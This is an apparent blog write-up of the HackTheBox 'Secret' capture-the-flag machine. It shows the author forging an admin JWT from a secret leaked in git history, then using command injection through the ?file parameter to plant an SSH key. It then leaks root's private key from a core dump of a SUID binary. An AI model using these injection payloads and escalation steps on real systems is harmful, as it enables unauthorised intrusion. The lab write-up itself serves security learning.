<!DOCTYPE html>
<html lang="en"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.8.0 -->
<title>[Writeup] HackTheBox Secret | daanbreur</title>
<meta name="generator" content="Jekyll v4.2.2" />
<meta property="og:title" content="[Writeup] HackTheBox Secret" />
<meta name="author" content="daanbreur" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Hey, I am Daan. A programmer and hacker." />
<meta property="og:description" content="Hey, I am Daan. A programmer and hacker." />
<link rel="canonical" href="https://blog.daanbreur.systems/2022/03/26/htb-Secret.html" />
<meta property="og:url" content="https://blog.daanbreur.systems/2022/03/26/htb-Secret.html" />
<meta property="og:site_name" content="daanbreur" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2022-03-26T00:00:00+00:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="[Writeup] HackTheBox Secret" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"daanbreur"},"dateModified":"2022-03-26T00:00:00+00:00","datePublished":"2022-03-26T00:00:00+00:00","description":"Hey, I am Daan. A programmer and hacker.","headline":"[Writeup] HackTheBox Secret","mainEntityOfPage":{"@type":"WebPage","@id":"https://blog.daanbreur.systems/2022/03/26/htb-Secret.html"},"url":"https://blog.daanbreur.systems/2022/03/26/htb-Secret.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/css/style.css">
  <link rel="icon" type="image/png" href="/assets/favicon.png" /><link type="application/atom+xml" rel="alternate" href="https://blog.daanbreur.systems/feed.xml" title="daanbreur" />
    <!-- Google Analytics -->
    <script>
    (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
    (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
    m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
    })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

    ga('create', 'UA-92520479-2', 'auto');
	ga('send', 'pageview', { 'page': location.pathname + location.search + location.hash});
	ga('set', 'anonymizeIp', true);
    </script>
    <!-- End Google Analytics -->
    </head>
<body><div class="site-header">
  <div class="wrapper">
    <a class="site-title" rel="author" href="/">daanbreur<b class="command_prompt"></b><b class="blinking_cursor">_</b></a>
    <span class="social_links">
        <a class="color-cyan-hover" href="https://twitter.com/portaalg"><i class="fab fa-twitter"></i></a><a class="color-purple-hover" href="https://www.twitch.tv/portaalgaming"><i class="fab fa-twitch"></i></a><a class="color-red-hover" href="https://www.youtube.com/channel/UCGWs9foruVqIoEf2sLBfJAg"><i class="fab fa-youtube"></i></a><a class="color-yellow-hover" href="https://github.com/daanbreur"><i class="fab fa-github"></i></a>
    </span>
  </div>
</div>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        
  <div class="author-box">
    
    
        <img src="
            https://github.com/daanbreur.png
        " class="author-avatar" alt="Avatar" />
    
Hey, I am Daan. A programmer and hacker.
</div>


<div class="post">
  <h1 class="post-title">[Writeup] HackTheBox | Secret</h1>
  
  <div class="post-tags">
      
      <a class="tag" href="/tag/hackthebox/">hackthebox</a>
      
      <a class="tag" href="/tag/linux/">linux</a>
      
      <a class="tag" href="/tag/nodejs/">nodejs</a>
      
      <a class="tag" href="/tag/jwt/">jwt</a>
      
  </div>
  
  <div class="post-date">Published on 26 Mar 2022</div>
  
  <p><img src="/assets/CTFs/HTB/Secret/infopanel.png" alt="" class="modal" /></p>

<h2 id="information-gathering">Information Gathering</h2>

<p>Lets start with enumerating the machine using nmap to find open ports and information about the services running on those.
I used the following command todo so.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-oN</span> nmap/detailed 10.10.11.120
</code></pre></div></div>

<p>The options I used are: <code class="language-plaintext highlighter-rouge">-sC</code> to run TCP connection scan, <code class="language-plaintext highlighter-rouge">-sV</code> to run a service scan, <code class="language-plaintext highlighter-rouge">-oN</code> to save to file.</p>

<pre><code class="language-log">Nmap scan report for 10.10.11.120
Host is up (0.031s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 97:af:61:44:10:89:b9:53:f0:80:3f:d7:19:b1:e2:9c (RSA)
|   256 95:ed:65:8d:cd:08:2b:55:dd:17:51:31:1e:3e:18:12 (ECDSA)
|_  256 33:7b:c1:71:d3:33:0f:92:4e:83:5a:1f:52:02:93:5e (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: DUMB Docs
3000/tcp open  http    Node.js (Express middleware)
|_http-title: DUMB Docs
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Feb 21 20:48:47 2022 -- 1 IP address (1 host up) scanned in 13.33 seconds
</code></pre>

<p>Port 80 has a nginx server and Port 3000 has a NodeJS express server.
The nginx server may just be a reverseproxy. Going to port 80 and 3000 in a browser we get the same site, this means nginx is probably only running as a reverse proxy. We find a download link on the website with the api sourcecode, lets enumerate and search for vulnerabilities.</p>

<h3 id="enumeration---source-code">Enumeration - Source Code</h3>

<p>First thing I did is list all files in the directory.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">ls</span> <span class="nt">-la</span>
total 119
drwxrwxrwx 1 root root  4096 sep  3  2021 <span class="nb">.</span>
drwxrwxrwx 1 root root     0 feb 21 21:06 ..
<span class="nt">-rwxrwxrwx</span> 1 root root    72 sep  3  2021 .env
drwxrwxrwx 1 root root  4096 sep  8  2021 .git
<span class="nt">-rwxrwxrwx</span> 1 root root   885 sep  3  2021 index.js
drwxrwxrwx 1 root root     0 aug 13  2021 model
drwxrwxrwx 1 root root 40960 aug 13  2021 node_modules
<span class="nt">-rwxrwxrwx</span> 1 root root   491 aug 13  2021 package.json
<span class="nt">-rwxrwxrwx</span> 1 root root 69452 aug 13  2021 package-lock.json
drwxrwxrwx 1 root root     0 sep  3  2021 public
drwxrwxrwx 1 root root     0 feb 21 22:12 routes
drwxrwxrwx 1 root root     0 aug 13  2021 src
<span class="nt">-rwxrwxrwx</span> 1 root root   651 aug 13  2021 validations.js
</code></pre></div></div>

<p>And we notice a few things, this is indeed a NodeJS application. It also contains <code class="language-plaintext highlighter-rouge">.git</code> folder and there is a <code class="language-plaintext highlighter-rouge">.env</code> file.
A <code class="language-plaintext highlighter-rouge">.git</code> folder is what git uses for repo’s its essentially where all the commits and changes are stored. A <code class="language-plaintext highlighter-rouge">.env</code> file is a file where you can place your environment variables, so you can exclude the file before uploading the rest of your source.</p>

<p>Lets also take a look at the endpoints. One of the files looks interesting <code class="language-plaintext highlighter-rouge">/routes/private.js</code> which contains a entry for <code class="language-plaintext highlighter-rouge">/api/logs</code>.
It takes a query parameter <code class="language-plaintext highlighter-rouge">?file</code> and run <code class="language-plaintext highlighter-rouge">git log --oneline</code> with the parameter <code class="language-plaintext highlighter-rouge">file</code> appended to it, this can lead us to RCE!
But only the admin (<code class="language-plaintext highlighter-rouge">username: "theadmin"</code>) can use it.</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">router</span><span class="p">.</span><span class="kd">get</span><span class="p">(</span><span class="dl">'</span><span class="s1">/logs</span><span class="dl">'</span><span class="p">,</span> <span class="nx">verifytoken</span><span class="p">,</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span>
    <span class="kd">const</span> <span class="nx">file</span> <span class="o">=</span> <span class="nx">req</span><span class="p">.</span><span class="nx">query</span><span class="p">.</span><span class="nx">file</span><span class="p">;</span>
    <span class="kd">const</span> <span class="nx">userinfo</span> <span class="o">=</span> <span class="p">{</span> <span class="na">name</span><span class="p">:</span> <span class="nx">req</span><span class="p">.</span><span class="nx">user</span> <span class="p">}</span>
    <span class="kd">const</span> <span class="nx">name</span> <span class="o">=</span> <span class="nx">userinfo</span><span class="p">.</span><span class="nx">name</span><span class="p">.</span><span class="nx">name</span><span class="p">;</span>
    
    <span class="k">if</span> <span class="p">(</span><span class="nx">name</span> <span class="o">==</span> <span class="dl">'</span><span class="s1">theadmin</span><span class="dl">'</span><span class="p">){</span>
        <span class="kd">const</span> <span class="nx">getLogs</span> <span class="o">=</span> <span class="s2">`git log --oneline </span><span class="p">${</span><span class="nx">file</span><span class="p">}</span><span class="s2">`</span><span class="p">;</span>
        <span class="nx">exec</span><span class="p">(</span><span class="nx">getLogs</span><span class="p">,</span> <span class="p">(</span><span class="nx">err</span> <span class="p">,</span> <span class="nx">output</span><span class="p">)</span> <span class="o">=&gt;</span><span class="p">{</span>
            <span class="k">if</span><span class="p">(</span><span class="nx">err</span><span class="p">){</span>
                <span class="nx">res</span><span class="p">.</span><span class="nx">status</span><span class="p">(</span><span class="mi">500</span><span class="p">).</span><span class="nx">send</span><span class="p">(</span><span class="nx">err</span><span class="p">);</span>
                <span class="k">return</span>
            <span class="p">}</span>
            <span class="nx">res</span><span class="p">.</span><span class="nx">json</span><span class="p">(</span><span class="nx">output</span><span class="p">);</span>
        <span class="p">})</span>
    <span class="p">}</span>
    <span class="k">else</span><span class="p">{</span>
        <span class="nx">res</span><span class="p">.</span><span class="nx">json</span><span class="p">({</span>
            <span class="na">role</span><span class="p">:</span> <span class="p">{</span>
                <span class="na">role</span><span class="p">:</span> <span class="dl">"</span><span class="s2">you are normal user</span><span class="dl">"</span><span class="p">,</span>
                <span class="na">desc</span><span class="p">:</span> <span class="nx">userinfo</span><span class="p">.</span><span class="nx">name</span><span class="p">.</span><span class="nx">name</span>
            <span class="p">}</span>
        <span class="p">})</span>
    <span class="p">}</span>
<span class="p">})</span>
</code></pre></div></div>

<p>Another file I notice is <code class="language-plaintext highlighter-rouge">/routes/verifytoken.js</code> . This is the code that checks our <code class="language-plaintext highlighter-rouge">auth-token</code> it looks like this is using JWT. 
The verify function doesn’t check the algorithm used on the JWT-token. It only specifies the secret to use, this is stored in environment variable <code class="language-plaintext highlighter-rouge">TOKEN_SECRET</code>.</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">module</span><span class="p">.</span><span class="nx">exports</span> <span class="o">=</span> <span class="kd">function</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">,</span> <span class="nx">next</span><span class="p">)</span> <span class="p">{</span>
    <span class="kd">const</span> <span class="nx">token</span> <span class="o">=</span> <span class="nx">req</span><span class="p">.</span><span class="nx">header</span><span class="p">(</span><span class="dl">"</span><span class="s2">auth-token</span><span class="dl">"</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nx">token</span><span class="p">)</span> <span class="k">return</span> <span class="nx">res</span><span class="p">.</span><span class="nx">status</span><span class="p">(</span><span class="mi">401</span><span class="p">).</span><span class="nx">send</span><span class="p">(</span><span class="dl">"</span><span class="s2">Access Denied</span><span class="dl">"</span><span class="p">);</span>

    <span class="k">try</span> <span class="p">{</span>
        <span class="kd">const</span> <span class="nx">verified</span> <span class="o">=</span> <span class="nx">jwt</span><span class="p">.</span><span class="nx">verify</span><span class="p">(</span><span class="nx">token</span><span class="p">,</span> <span class="nx">process</span><span class="p">.</span><span class="nx">env</span><span class="p">.</span><span class="nx">TOKEN_SECRET</span><span class="p">);</span>
        <span class="nx">req</span><span class="p">.</span><span class="nx">user</span> <span class="o">=</span> <span class="nx">verified</span><span class="p">;</span>
        <span class="nx">next</span><span class="p">();</span>
    <span class="p">}</span> <span class="k">catch</span> <span class="p">(</span><span class="nx">err</span><span class="p">)</span> <span class="p">{</span>
        <span class="nx">res</span><span class="p">.</span><span class="nx">status</span><span class="p">(</span><span class="mi">400</span><span class="p">).</span><span class="nx">send</span><span class="p">(</span><span class="dl">"</span><span class="s2">Invalid Token</span><span class="dl">"</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">};</span>
</code></pre></div></div>

<p>Remember that we found that <code class="language-plaintext highlighter-rouge">.env</code> file? Maybe this contains our <code class="language-plaintext highlighter-rouge">TOKEN_SECRET</code> variable and we can use it to craft our JWT-token.
Logging the file we see it doesn’t contain much information and that the <code class="language-plaintext highlighter-rouge">TOKEN_SECRET</code> is <code class="language-plaintext highlighter-rouge">secret</code>. Its likely removed.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>DB_CONNECT <span class="o">=</span> <span class="s1">'mongodb://127.0.0.1:27017/auth-web'</span>
TOKEN_SECRET <span class="o">=</span> secret
</code></pre></div></div>

<p>If it was ever in there it should be in a git commit, because the folder is a repository. Lets check the logs.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>git log
</code></pre></div></div>

<p>It contains a commit <em>“removed .env for security reasons”</em>, lets use <code class="language-plaintext highlighter-rouge">git diff</code> to check what changed. The commithash associated is <code class="language-plaintext highlighter-rouge">67d8da7a0e53d8fadeb6b36396d86cdcd4f6ec78</code>.
To view changes in a specific commit you can use the following command <code class="language-plaintext highlighter-rouge">git diff COMMIT^!</code>. The <code class="language-plaintext highlighter-rouge">COMMIT</code> parameter is a <a href="https://git-scm.com/docs/gitglossary#def_commit-ish">commit-ish</a>.</p>

<blockquote>
  <p>A <a href="https://git-scm.com/docs/gitglossary#def_commit_object">commit object</a> or an <a href="https://git-scm.com/docs/gitglossary#def_object">object</a> that can be recursively dereferenced to a commit object. The following are all commit-ishes: a commit object, a <a href="https://git-scm.com/docs/gitglossary#def_tag_object">tag object</a> that points to a commit object, a tag object that points to a tag object that points to a commit object, etc.</p>
</blockquote>

<p>This basically means the hash that we just found.
Replacing this with the correct value and this will be the command we need to run.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>git diff de0a46b5107a2f4d26e348303e76d85ae4870934..
</code></pre></div></div>

<div class="language-diff highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gh">diff --git a/.env b/.env
index fb6f587..31db370 100644
</span><span class="gd">--- a/.env
</span><span class="gi">+++ b/.env
</span><span class="p">@@ -1,2 +1,2 @@</span>
 DB_CONNECT = 'mongodb://127.0.0.1:27017/auth-web'
<span class="gd">-TOKEN_SECRET = gXr67TtoQL8TShUc8XYsK2HvsBYfyQSFCFZe4MQp7gRpFuMkKjcM72CNQN4fMfbZEKx4i7YiWuNAkmuTcdEriCMm9vPAYkhpwPTiuVwVhvwE
</span><span class="gi">+TOKEN_SECRET = secret
</span></code></pre></div></div>

<p>And we see a secret! Now we can use this so sign the JWT-token. The contents of the token will be <code class="language-plaintext highlighter-rouge">{"name":"theadmin"}</code>.
I used an online tool to generate the JWT-token and this is my result <em>eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoidGhlYWRtaW4ifQ.GDRG1ileUj55S0ZdAAZhtUz28Hz4s7fHgqbiES5Qr7s</em></p>

<p><img src="/assets/CTFs/HTB/Secret/jwt-generate.png" alt="" class="modal" /></p>

<p>Now if we set the <code class="language-plaintext highlighter-rouge">auth-token</code> header to our generated JWT-token and go to <code class="language-plaintext highlighter-rouge">/api/priv</code> it shows us that we are the  <code class="language-plaintext highlighter-rouge">"theadmin"</code>.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl <span class="nt">-i</span> <span class="nt">-H</span> <span class="s1">'auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoidGhlYWRtaW4ifQ.GDRG1ileUj55S0ZdAAZhtUz28Hz4s7fHgqbiES5Qr7s'</span> <span class="s1">'http://10.10.11.120/api/priv'</span>
</code></pre></div></div>

<h2 id="gaining-user">Gaining user</h2>

<p>Now that we are the required user we can start exploiting the API. Adding any command to the end of the <code class="language-plaintext highlighter-rouge">?file</code> parameter will run it. Lets try it with <code class="language-plaintext highlighter-rouge">id</code>.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl <span class="nt">-i</span> <span class="nt">-H</span> <span class="s1">'auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoidGhlYWRtaW4ifQ.GDRG1ileUj55S0ZdAAZhtUz28Hz4s7fHgqbiES5Qr7s'</span> <span class="s1">'http://10.10.11.120/api/logs?file=.env;id'</span>
</code></pre></div></div>

<p>We get command output. <code class="language-plaintext highlighter-rouge">"ab3e953 Added the codes\nuid=1000(dasith) gid=1000(dasith) groups=1000(dasith)\n"</code>.
Now we can try getting a reverseshell. After playing around a bit to get one working I ended up generating and uploading a sshkey.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ssh-keygen <span class="nt">-t</span> rsa <span class="nt">-b</span> 4096 <span class="nt">-C</span> <span class="s1">'get@hacked'</span> <span class="nt">-f</span> dasith <span class="nt">-P</span> <span class="s1">''</span>
</code></pre></div></div>

<p>From the output from <code class="language-plaintext highlighter-rouge">id</code> we know that the username is <code class="language-plaintext highlighter-rouge">dasith</code>. Our attackplan is as follows.</p>
<ol>
  <li>Make the <code class="language-plaintext highlighter-rouge">.ssh</code> folder in the home directory if it doesn’t exist. <em>(<code class="language-plaintext highlighter-rouge">mkdir -p /home/dasith/.ssh</code>)</em></li>
  <li>Write our public key to the <code class="language-plaintext highlighter-rouge">authorized_keys</code> <em>(<code class="language-plaintext highlighter-rouge">echo $PUBLIC_KEY &gt;&gt; /home/dasith/.ssh/authorized_keys</code>)</em></li>
</ol>

<p>First lets store our public key contents into a bash variable <code class="language-plaintext highlighter-rouge">$PUBLIC_KEY</code>. This will be easier then copying it into the request.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">export </span><span class="nv">PUBLIC_KEY</span><span class="o">=</span><span class="si">$(</span><span class="nb">cat </span>dasith.pub<span class="si">)</span>
</code></pre></div></div>

<p>Then running the curl command that “uploads” our public key.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl <span class="nt">-i</span> <span class="nt">-H</span> <span class="s1">'auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoidGhlYWRtaW4ifQ.GDRG1ileUj55S0ZdAAZhtUz28Hz4s7fHgqbiES5Qr7s'</span> <span class="nt">-G</span> <span class="nt">--data-urlencode</span> <span class="s2">"file=.env;mkdir -p /home/dasith/.ssh; echo </span><span class="nv">$PUBLIC_KEY</span><span class="s2"> &gt;&gt; /home/dasith/.ssh/authorized_keys"</span> http://10.10.11.120/api/logs
</code></pre></div></div>
<p>This will be our final command.
What does it do?</p>

<ul>
  <li>Print Headers</li>
  <li>Use GET</li>
  <li>Send the parameters inside of the query</li>
  <li>Send this command <code class="language-plaintext highlighter-rouge">mkdir -p /home/dasith/.ssh; echo $PUBLIC_KEY &gt;&gt; /home/dasith/.ssh/authorized_keys</code> where <code class="language-plaintext highlighter-rouge">$PUBLIC_KEY</code> is replaced with the contents that we already saved to it.</li>
</ul>

<p>Now we can use our sshkey to login.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ssh <span class="nt">-i</span> dasith dasith@10.10.11.120
</code></pre></div></div>

<p>Now that we are in, we can get the flag!</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">cat </span>user.txt 
&lt;REDACTED&gt;
</code></pre></div></div>

<h2 id="enumeration">Enumeration</h2>

<p>Inside of the <code class="language-plaintext highlighter-rouge">/opt</code> folder we find a SUID binary <strong><code class="language-plaintext highlighter-rouge">count</code></strong> and its source code.
Looking through the sourcecode I find something interesting.
It contains the following code</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">prctl</span><span class="p">(</span><span class="n">PR_SET_DUMPABLE</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>
</code></pre></div></div>

<p>This means that when the program crashes it generates a dump file.
We can make the program crash on purpose to leak information that’s stored in memory.
Like the file contents!</p>

<h2 id="gaining-root">Gaining root</h2>

<p>Now we can read any file as root. What next? Well root might have a idrsa file that we can then use to login over ssh.
Our attack steps are as follows.</p>

<ol>
  <li>Run the binary.</li>
  <li>Supply the filename to read (<code class="language-plaintext highlighter-rouge">/root/.ssh/id_rsa</code>).</li>
  <li>Background the process (<kbd>Ctrl</kbd> + Z).</li>
  <li>Get process id using <code class="language-plaintext highlighter-rouge">ps</code>.</li>
  <li>Kill the process, with the flag <code class="language-plaintext highlighter-rouge">SIGSEGV</code>.</li>
  <li>Foreground process with <code class="language-plaintext highlighter-rouge">fg</code>.</li>
</ol>

<p>Lets do it and see if it works.</p>

<p><img src="/assets/CTFs/HTB/Secret/coredump-count.png" alt="" class="modal" /></p>

<p>We succesfully dumped the core. Now we need to retrieve the data inside of the dump.
Start by checking what utility is used to “pack” the data. This is commonly stored in <code class="language-plaintext highlighter-rouge">/proc/sys/kernel/core_pattern</code>.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>|/usr/share/apport/apport %p %s %c %d %P %E
</code></pre></div></div>

<p>In this case, a crash will be handled by the <a href="https://wiki.ubuntu.com/Apport">Apport</a> utility.
We can unpack the file using <code class="language-plaintext highlighter-rouge">apport-unpack</code>, apport by default saves its crashes in <code class="language-plaintext highlighter-rouge">/var/crash</code>. 
With the following command we unpack it to <code class="language-plaintext highlighter-rouge">/tmp/crashdata</code>.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>apport-unpack /var/crash/_opt_count.1000.crash /tmp/crashdata
</code></pre></div></div>

<p>Now that we unpacked the crash we can look at the <code class="language-plaintext highlighter-rouge">CoreDump</code> file located inside of the folder we extracted to.
Lets run strings against it to look for any strings.</p>

<p><img src="/assets/CTFs/HTB/Secret/coredump-strings.png" alt="" class="modal" /></p>

<p><img src="/assets/CTFs/HTB/Secret/dump-idrsa.png" alt="" class="modal" /></p>

<p>And somewhere in there we found our <code class="language-plaintext highlighter-rouge">/root/.ssh/id_rsa</code> file.
Lets save it to a file <code class="language-plaintext highlighter-rouge">secret.root</code> and then login with it using ssh.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">chmod </span>600 secret.root
ssh <span class="nt">-i</span> secret.root root@10.10.11.120
</code></pre></div></div>

<p>We got a shell and are logged in as root!
Now we can get the flag and submit it.</p>

<p><img src="/assets/CTFs/HTB/Secret/root-flag.png" alt="" class="modal" /></p>

<p>Of course you would have been able to just get the flag from the coredump method but then you didn’t really root the box, only got a way to read files.</p>

<h2 id="references">References</h2>

<ul>
  <li><a href="https://jwt.io/">JWT.io</a></li>
  <li><a href="https://linux-audit.com/understand-and-configure-core-dumps-work-on-linux/">Understanding core dumps Linux</a></li>
  <li><a href="https://man7.org/linux/man-pages/man2/prctl.2.html">prctl(2) - Linux manual page</a></li>
  <li><a href="https://wiki.ubuntu.com/Apport">Apport - Ubuntu Wiki</a></li>
</ul>

</div>





<div class="related">
  <h2>related posts</h2>
  <ul class="related-posts">
    
      <li>
        <h3>
          <a href="/2022/03/15/UTCTF2022-Websockets.html">
            [Writeup] UTCTF 2022 | Websockets?
          </a>
        </h3>
      </li>
    
      <li>
        <h3>
          <a href="/2021/05/28/htb-Delivery.html">
            [Writeup] HackTheBox | Delivery
          </a>
        </h3>
      </li>
    
      <li>
        <h3>
          <a href="/2021/05/25/PixelPlush-Scoreboard-XSS.html">
            [Writeup] Pentesting | XSS in the Pixelplush Scoreboard
          </a>
        </h3>
      </li>
    
  </ul>
</div>




  
  <h2>all tags</h2>
  <div class="tag-cloud"><a href="/tag/authentication/" class="set-1">authentication</a> <a href="/tag/bruteforcing/" class="set-1">bruteforcing</a> <a href="/tag/encryption/" class="set-1">encryption</a> <a href="/tag/hackthebox/" class="set-3">hackthebox</a> <a href="/tag/jinja2/" class="set-1">jinja2</a> <a href="/tag/jwt/" class="set-1">jwt</a> <a href="/tag/linux/" class="set-3">linux</a> <a href="/tag/misconfiguration/" class="set-1">misconfiguration</a> <a href="/tag/mongodb/" class="set-1">mongodb</a> <a href="/tag/nodejs/" class="set-1">nodejs</a> <a href="/tag/nosqlinjection/" class="set-1">nosqlinjection</a> <a href="/tag/passwordreuse/" class="set-1">passwordreuse</a> <a href="/tag/pathhijacking/" class="set-1">pathhijacking</a> <a href="/tag/pixelplush/" class="set-1">pixelplush</a> <a href="/tag/python/" class="set-1">python</a> <a href="/tag/reversing/" class="set-1">reversing</a> <a href="/tag/tryhackme/" class="set-1">tryhackme</a> <a href="/tag/web/" class="set-5">web</a> <a href="/tag/websocket/" class="set-1">websocket</a> <a href="/tag/xss/" class="set-1">xss</a></div>
  



      </div>
    </main><footer class="site-footer">
  <div class="wrapper">
    <div class="credits"><a href="https://github.com/bitbrain/jekyll-dash">dash</a> theme for Jekyll by <a href="https://github.com/bitbrain">bitbrain</a> made with <i class="fas fa-heart"></i><div class="toggleWrapper">
    <input type="checkbox" class="dn" id="theme-toggle" onclick="modeSwitcher()" checked />
    <label for="theme-toggle" class="toggle">
    <span class="toggle__handler">
      <span class="crater crater--1"></span>
      <span class="crater crater--2"></span>
      <span class="crater crater--3"></span>
    </span>
        <span class="star star--1"></span>
        <span class="star star--2"></span>
        <span class="star star--3"></span>
        <span class="star star--4"></span>
        <span class="star star--5"></span>
        <span class="star star--6"></span>
    </label>
</div>
<script type="text/javascript">
const theme = localStorage.getItem('theme');

if (theme === "light") {
    document.documentElement.setAttribute('data-theme', 'light');
} else {
    document.documentElement.setAttribute('data-theme', 'dark');
}
const userPrefers = getComputedStyle(document.documentElement).getPropertyValue('content');

function activateDarkTheme() {
    document.getElementById('theme-toggle').checked = true;
    document.documentElement.setAttribute('data-theme', 'dark');
    document.documentElement.classList.add('theme--dark');
    document.documentElement.classList.remove('theme--light');
	document.getElementById("theme-toggle").className = 'light';
	window.localStorage.setItem('theme', 'dark');
}

function activateLightTheme() {
    document.getElementById('theme-toggle').checked = false;
    document.documentElement.setAttribute('data-theme', 'light');
    document.documentElement.classList.add('theme--light');
    document.documentElement.classList.remove('theme--dark');
	document.getElementById("theme-toggle").className = 'dark';
	window.localStorage.setItem('theme', 'light');
}

if (theme === "dark") {
    activateDarkTheme();
} else if (theme === "light") {
    activateLightTheme();
} else if  (userPrefers === "light") {
    activateDarkTheme();
} else {
    activateDarkTheme();
}

function modeSwitcher() {
	let currentMode = document.documentElement.getAttribute('data-theme');
	if (currentMode === "dark") {
	    activateLightTheme();
	} else {
	    activateDarkTheme();
	}
}
</script></div>
  </div>
</footer>


<script>
      window.FontAwesomeConfig = {
        searchPseudoElements: true
      }
    </script>
  </body>

</html>
